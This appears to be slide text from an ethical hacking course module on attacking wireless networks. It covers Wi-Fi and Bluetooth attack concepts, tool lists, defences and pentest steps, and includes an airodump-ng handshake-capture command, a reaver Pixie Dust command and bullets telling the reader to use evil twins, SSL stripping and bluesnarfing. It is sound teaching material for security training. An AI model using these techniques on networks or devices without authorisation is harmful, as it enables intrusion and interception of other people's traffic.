Ethical Hacking v10 Module 14 – Hacking Wireless Networks

Hacking Wireless Networks

Goals• Understand Wireless Concepts• Understand Wireless Encryption Algorithms• Understand Wireless Threats• Understand Wireless Hacking

Methodologies• Learn Wireless Hacking Tools• Understand Bluetooth Hacking Techniques• Understand Countermeasures to Wireless

Hacking• Learn Wireless Security Tools• Understand Wireless Penetration Testing

Module 14.0 Hacking Wireless Networks• 14.1 Wireless Concepts• 14.2 Wireless Discovery and Mapping• 14.3 Wi-Fi Sniffers• 14.4 Wi-Fi Attacks• 14.5 Wi-Fi Cracking• 14.6 Wireless Hacking Tools• 14.7 Bluetooth Hacking• 14.8 Wireless Hacking Countermeasures• 14.9 Wireless Security Tools• 14.10 Wireless Penetration Testing

14.1 Wireless Concepts

Wireless Network Basics

• Wireless Local Area Networks (WLAN)• Based on the IEEE 802.11 standard• Uses radio channels for communication• Devices connect to the network via a wireless network access point• Advantages• Disadvantages

Wireless Network Advantages and Disadvantages• Advantages• Fast, easy installation• Easy connectivity where cables can’t easily be used• Internet access from anywhere in range of access point• Free internet connections in many public places

• Disadvantages• Security is a concern• The more devices on the network the more bandwidth is compromised • Enhancements may need new wireless access points and/or wireless cards• Wi-Fi networks can be disrupted by some electronic equipment

Wireless Terminology

• GSM• Bandwidth• BSSID• ISM Band• Access Point• Hotspot• Association

• Orthogonal Frequency-division Multiplexing (OFDM)• Direct-sequence Spread Spectrum

(DSSS)• Frequency-hopping Spread

Spectrum (FHSS)

How are Wired and Wireless Networks Different?• Most wired exploits will also work against Wi-Fi wireless

• Sniffing• Spoofing• MITM/Hijacking• Deauthentication• DoS

• There are additional wireless LAN network technologies that have their own vulnerabilities• RFID• NFC• Bluetooth• Cellular

Wireless Network Types

• Extended to Wired Network• LAN-to-LAN Wireless Network• Multiple Access Points• 3G/4G Hotspot

Accessing Wireless Networks

• 802.11a• 802.11b• 802.11g• 802.11i• 802.11n• 802.11ac• 802.16 (WiMAX)• 802.15 (Bluetooth)

Service Set Identifier (SSID)

• A token used to identify a 802.11 network• A single, shared identifier located between client and access point• SSID is continuously broadcast from SSID• SSID consists of text that is human-readable• SSID on each host must be reconfigured when network SSID is changed• Clients can use non-secure access mode to access blank, configured, or

“any” SSID• Default values must be changed to ensure security• SSID is secret on closed networks

Authentication Modes for Wi-Fi

• Open-System Authentication Process• No key

• Shared-Key Authentication Process• Password is set on WAP and clients

• 802.1x • Typically the WAP is open• DHCP lease• Client browser opens/is redirected to a captive portal• Sometimes other protocols are permitted even if browser can’t connect• Login sent to a RADIUS/TACACS/TACACS+ server• Client caches short-term session token

Wi-Fi Chalking

• WarWalking: Attackers on foot use Wi-Fi-enabled laptops to identify open networks• WarChalking: Drawing symbols in public areas to indicate open

networks• WarFlying: Attackers use drones to identify open networks• WarDriving: Attackers use a vehicle to move around with Wi-Fi-

enabled laptops and identify open networks

Wi-Fi Chalking Symbols

• Free Wi-Fi• Wi-Fi with WEP• Wi-Fi with MAC Filtering• Wi-Fi with Multiple

Access Controls• Restricted Wi-Fi• Wi-Fi with Closed SSID• Pay for Wi-Fi• Wi-Fi Honeypot

Wireless Network Antennas

• Directional antenna• Omnidirectional antenna• Parabolic Grid antenna• Yagi antenna• Dipole antenna

14.2 Wireless Discovery and

Mapping

Wireless Discovery

• Attackers must first discover and footprint a wireless network• Active or Passive Footprinting a wireless network• Finding a wireless network:

• Attacker will first check all potential networks• Attacker will move around with wireless laptop to find active networks

Wireless Discovery Tools

• inSSIDer• NetSurveyor• Vistumbler• NetStumbler• WirelessMon• Kismet• WiFi Hopper• Wavestumbler

• iStumbler• WiFinder• Wellenreiter• AirCheck Wi-Fi Tester• AirRaider 2• Xirrus Wi-Fi Inspector• WiFi Finder• WeFi

InSSIDer Example

Mobile Wireless Discovery Tools

• WiFiFoFum-WiFi Scanner• WiFi Manager• Network Signal Info• OpenSignal Maps• Fing• Overlook WiFi

GPS Mapping

• Attacker makes map and database of Wi-Fi networks• Uses GPS to track Wi-Fi network location and uploads coordinates to

site• Attackers share or sell information

GPS Mapping Tools

• WiGLE• Skyhook• TamoGraph• WiFi Site Survey• Fluke Airmagnet

14.3 Wi-Fi Sniffers

Wireless Traffic Analysis

• Find Vulnerabilities• Do Wi-Fi Reconnaissance• Use Tool to Conduct Analysis• Select the appropriate card/chipset

Wireless Sniffing

• Use sniffers like Wireshark to obtain signals that traverse the air

• Interface will by default receive transmissions bound for it

• Put interface in promiscuous mode to capture all available transmissions

• Sniffing can enable eavesdropping on communications• More viable in open Wi-Fi• Encryption largely mitigates problems• Some information is sent in cleartext despite

encryption modes, such as MAC address• Use MAC address in spoofing attacks

Wireless Sniffing (cont’d)

• In WPA/WPA2 networks, use deauthentication to capture four-way handshake• Client must perform handshake when

reconnecting• Capture PSK exchanged in handshake• Try cracking PSK

• airodump-ng to sniff for handshake:• airodump-ng -c <channel> --bssid <MAC address> -w capture wlan0

Wi-Fi Packet Sniffers

• Wireshark with AirPcap• SteelCentral Packet Analyzer• OmniPeek Network Analyzer• CommView for Wi-Fi• Sniffer Portable Professional

Analyzer• Capsa• PRTG Network Monitor

• ApSniff• NetworkMiner• Airview• Observer• WifiScanner• Mognet• AirTraf

14.4 Wi-Fi Attacks

Wireless Threats

• Access Control Attack• Integrity Attack• Confidentiality Attack• Availability Attack• Authentication Attack• Rogue Access Point Attack• Client Mis-association• Misconfigured WAP• Unauthorized Association

• Ad Hoc Connection Attack• HoneySpot Access Point Attack• AP MAC Spoofing• DoS Attack• Jamming Signal Attack• Wi-Fi-Jamming Devices• MITM• Evil Twin

Launch Wireless Attacks

• Aircrack-ng Suite• Reveal Hidden SSIDs• Fragmentation Attack• MAC Spoofing Attack• Deauthentication Attack• Disassociation Attack• Man-in-the-Middle Attack• MITM Attack using Aircrack-ng

• Wireless ARP Poisoning Attack• Rogue Access Point• Evil Twin

Evil Twin Attacks

• Evil Twin Attacks are a type of attack where a rogue access point attempts to deceive users into believing that it is a legitimate access point• A form of social engineering• Often facilitated through

deauthentication• Attacker knocks client off real

network• Client reconnects to rogue AP

• Can launch all manner of attacks against connected victim

Evil Twin Attacks (cont’d)

• Effective because it's not always easy to determine the correct network• Real and fake can have same SSID• Can use same encryption protocol• Fake can be placed close to victim so it

shows up as a strong signal• Evil twins are usually open so as not to require

a password• Specific attacks leverage evil twin to make it

more effective

Evil Twin Attacks (cont’d)• Karma attack:• Some client devices send out probe

requests for known Wi-Fi networks• Doesn't wait passively for AP to send

beacon frame• Attacker listens for request and responds

with their rogue AP• Client doesn't need to be close to real AP• Attacker doesn't need to broadcast

spoofed SSID

Evil Twin Attacks (cont’d)• Downgrade attack:• Also called SSL strip• Entice victim to connect to evil twin• Victim navigates to HTTPS site• Evil twin acts as a proxy with secure

connection to site• Site responds, proxy intercepts

response, modifies it to use HTTP• Proxy forwards response to user,

who believes they have a secure connection• User's transmissions sent in

cleartext back to proxy

WiFi-Pumpkin Evil Twin Example

14.5 Wi-Fi Cracking

WEP Cracking

• Weak implementation of RC4 algorithm• Uses Initialization Vectors IVs to stretch the pre-shared key• IV pseudo-random generation has a bias• Can run a statistical analysis if you capture enough Ivs• 20,000 IVs for 40-bit key (64-bit encryption)• 40,000 IVs for 104-bit key (128-bit encryption)

• No digital signatures• No sequencing• Can capture a client ARP request and replay to accelerate IV generation

• Chosen ciphertext attack• Replay attack

WEP Cracking Example

WPA/WPA2 Cracking

• Introduced TKIP (key rotation)• Uses much stronger encryption (AES/CCMP)• Uses sequence numbers so replay can’t be used • Still susceptible to dictionary attack• WPA2 KRACK Attack forces the WAP to “reinstall” a zero length key• Done during WPA2 handshake• Key is installed several times• Can be forced down if key is believed to be “dropped”

WPA2 Enterprise

• 802.1x• RADIUS server

Wi-Fi Protected Setup (WPS) Attacks

The image part with relationship ID rId1 was not found in the file.

WPS is an attempt to streamline Wi-Fi

setup/device enrollment

The image part with relationship ID rId3 was not found in the file.

Clients use 8-digit PIN to connect.

Each PIN half is calculated separately

Only 11,000 possible valuesEasy to crack within hours

The image part with relationship ID rId5 was not found in the file.

Lockout policies can hamper PIN cracking online

Might take a couple weeks, but still feasible

Lockout may look for MAC address, so spoofing could be

used to bypassBrute forcing may trigger DoS on

certain WAPs

WPS Exploits

The image part with relationship ID rId1 was not found in the file.

Pixie Dust offline PIN cracking:

- Recover PIN in minutes- Several values create two hashes AP uses to authenticate to client- Nonces E-S1 and E-S2 may be weak in some vendors' APs- Nonces + PIN + other values = hashes- If nonces are known, you can match hashes to discover the PIN

The image part with relationship ID rId3 was not found in the file.

Reaver Pixie Dust attack:reaver -i wlan0 -b <AP MAC> -c <AP channel> -K 1

Cracking Wireless Encryption – WPA/WEP Cracking Tools• Aircrack-ng• Besside-ng• KisMAC• Cain & Abel• Elcomsoft Wireless Security Auditor• WepAttack• Wesside-ng• Reaver Pro• WEPCrack• WepDecrypt

• Portable Penetrator• CloudCracker• coWPAtty• Wifite• WepCrackGui• Penetrate Pro• Fern WiFi Cracker

WPS Reaver Attack Example

14.6 Wireless Hacking Tools

Sniffers

• Kismet• Wireshark• Airodump-ng• Vericode• Monitis

Wardriving Tools

• Airbase-ng• ApSniff• WiFiFoFum• MiniStumbler• WarLinux• MacStumbler• WiFi-Where• AirFart• AirTraf• 802.11 Network Discover Tools

Monitors

• NetworkManager• KWiFiManager• NetworkControl• Sentry Edge II• WaveNode• xosview• RF Monitor• DTC-340 RFXpert• RF Explorer• Home Curfew RF Monitoring System• SigMon

Analyzer Tools

• AirMagnet WiFi Analyzer• OptiView XG Network Analysis Tablet• Observer• Ufasoft Snif• vxSniffer• OneTouch AT Network Assistant• Capsa Network Analyzer• SoftPerfect Netowrk Protocol Analyzer• OmniPeek Network Analyzer• CommView for WiFi

Packet Capturing Tools

• WirelessNetView• Tcpdump• Airview• RawCap• Airodump-ng

Spectrum Analysis Tools

• Cisco Spectrum Expert• AirMedic USB• AirSleuth-Pro• BumbleBee-LX Spectrum Analyzer• Wi-Spy

MITM / Evil Twin Tools

• Karma• Wi-Fi Pumpkin• Wi-Fi Pineapple

Mobile Hacking Tools

• WiHack• Backtrack Simulator• Wps Wpa Tester

14.7 Bluetooth Hacking

Bluetooth Modes

• Discoverable Modes:• Discoverable• Limited Discoverable• Non-discoverable

• Pairing Modes• Non-pairable• Pairable

Bluetooth Threats

• Leaking Personal Information• Controlling Device Remotely• Device Bugging• Social Engineering• Sending False SMS Messages• Introduction of Malicious Code• Hiking Up Phone Bill Causing Financial Stress• Taking Advantage of Vulnerabilities in Protocols

Bluetooth Attacks

• Bluejacking• Sending unsolicited messages to Bluetooth-enabled devices

• Bluesnarfing• Unauthorized information access on a device

• Bluebugging• Unauthorized system access to a device

• BlueBorne• Collection of overflow attacks that could result in arbitrary code execution• Pairing and discoverability are not required on the target• Requires no user interaction

Bluesnarfing Example

Bluetooth Attacks (cont’d)

• Bluesmacking• DoS

• BluePrinting• Remotely discover details about Bluetooth enabled devices

• MAC Spoofing Attack• Man-in-the-Middle/Impersonation Attack

Bluetooth Hacking Tools

• PhoneSnoop• BlueScanner• BH BlueJack• Bluesnarfer• btCrawler• Bluediving• Blooover II• btscanner

• CIHwBT• BT Audit• Blue Alert• Blue Sniff

14.8 Wireless Hacking

Countermeasures

Defending Against Bluetooth Hacking

• Ensure PIN keys use non-regular patterns• Ensure device is always in hidden mode• Keep track of all past paired devices and delete suspicious devices• Ensure BT is kept disabled unless required• Never accept pairing requests from unknown devices• Ensure encryption is enabled when connecting to a PC

Defending Against Bluetooth Hacking (cont’d)

• Keep device network range at its lowest• Only pair with other devices in a secure area• Ensure antivirus is installed• Ensure default security settings are changed to the best possible

standard• Ensure all BT connections use Link Encryption• Ensure encryption is empowered for multiple wireless

communications

Wireless Security Layers

• Connection Security• Wireless Signal Security• Device Security• End-user Protection• Data Protection• Network Protection

Defending Against Wireless Attacks

Configuration Best Practices:• Ensure default SSID is changed once WLAN is configured• Ensure remote router login is disabled• Ensure router access password is set and firewall protection is

enabled• Ensure MAC Address filtering is enabled on routers/access points• Ensure SSID broadcasts are disabled at access points and passphrase

is changed frequently

Defending Against Wireless Attacks (cont’d)

SSID Settings Best Practices:• Always use SSID cloaking• Keep passphrases free of SSID, network/company name, or anything

that is easy to figure out• Ensure there is a firewall/packet filter between AP and Intranet• Keep wireless network strength low enough avoid detection outside

organization• Regularly ensure there are no issues with setup/configuration• Use extra traffic encryption

Defending Against Wireless Attacks (cont’d)

Authentication Best Practices:• Use WPA instead of WEP• Ensure access points are in secure locations• Use WPA2 if possible• Ensure all wireless drivers are up-to-date• Ensure network is disabled when it isn’t needed• Ensure authentication via a centralized server

14.9 Wireless Security Tools

Wireless Security Auditing Tools

• AirMagnet WiFi Analyzer• Motorola’s AirDefense Services Platform (ADSP)• Adaptive Wireless IPS• Aruba RFProtect

Wireless Intrusion Prevention Systems

• Extreme Networks Intrusion Prevention System• AirMagnet Enterprise• Dell SonicWALL Clean Wireless• HP TippingPoint NX Platform NGIPS• AirTight WIPS• Network Box IDP• AirMobile Server• Wireless Policy Manager (WPM)• ZENworks Endpoint Security Management• FortiWiFi

Wireless Predictive Planning Tools

• AirMagnet Planner• Cisco Prime Infrastructure• AirTight Planner• LANPlanner• RingMaster• Connect EZ Predictive RF CAD Design• Ekahau Site Survey (ESS)• ZonePlanner• Wi-Fi Planning Tool• TamoGraph Site Survey

Wireless Vulnerability Scanning Tools

• Zenmap• Nessus• OSWA-Assistant• Network Security Toolkit• Nexpose Community Edition• WiFish Finder• Penetrator Vulnerability Scanning Appliance• SILICA• WebSploit• Airbase-ng

Bluetooth Security Tools

• No automatic pairing• Turn off discovery• Bluetooth Firewall

Mobile Wi-Fi Security Tools

• WiFi Protector• WiFiGuard• Wifi Inspector

14.10 Wireless Penetration

Testing

Steps to Penetration Testing Wireless

• Discover WAPs with Airmon-ng• Query WAPs for protocols• Use directional antennas for better signal gain• Use Wireshark to capture unencrypted traffic• Use Aircrack-ng suite, Fern Wi-Fi, or Bessiden-ng to crack WEP, WPA,

WPA2• Use Karma for MITM attacks• Use Reaver/Pixie Dust to crack WPS• Use social engineering/evil twins to capture user passwords wirelessly

Wireless Hacking Review

• IEEE 802.11 Wi-Fi networks used for data transfer/communication across radio network• Wi-Fi infrastructure made of software and

hardware• Most used encryption WPA, WPA2, and WEP –

WPA2 most secure• WEP uses 24-bit IV, stream cipher RC4, and

CRC-32 checksum• WPA uses TKIP, stream cipher RC4 128-bit and

62-bit keys; WPA2 uses 256-bit key with AES encryption• WEP is vulnerable to analytical attacks• Countermeasures to Wi-Fi attack are wireless

IDS systems and best practices for configuration, SSID, and authentication

Penetrating Wireless Networks Review

• Use aircrack-ng to crack keys on Wi-Fi networks secured with WEP• Use a replay attack to obtain a repeated

24-bit IV• Speed up WEP cracking with a

fragmentation attack using aireplay-ng• Use the PRGA obtained from fragmentation

to craft a packet with packetforge-ng• Send a crafted packet to an AP to easily

obtain thousands of IVs• Check the laws in your area before using

radio jamming devices

Penetrating Wireless Networks Review (cont’d)

• Use a tool like aireplay-ng to knock clients off a WAP

• Spoof MAC addresses in deauthenticationattacks

• Use evil twins to entice users to connect to your rogue AP

• Use Karma attacks by sending a probing request to trick client into connecting to evil twin

• Use SSL strip with evil twin to downgrade a user's HTTPS session

• Place your wireless interface in promiscuous mode to receive all available signals

• Use airodump-ng to sniff four-way wireless handshake for WPA/WPA2 key cracking

Penetrating Wireless Networks Review (cont’d)

• Use online brute forcing to crack a WPS PIN• Use Pixie Dust attack to conduct offline

cracking of vulnerable APs• Use bluejacking to send unsolicited messages

to discoverable Bluetooth devices• Use bluesnarfing to read sensitive information

from discoverable Bluetooth devices• Use bluebugging to gain system access to a

Bluetooth enabled device• Use blueborne to gain access to a Bluetooth

enabled device without involving the victim

Lab 14: Hacking Wireless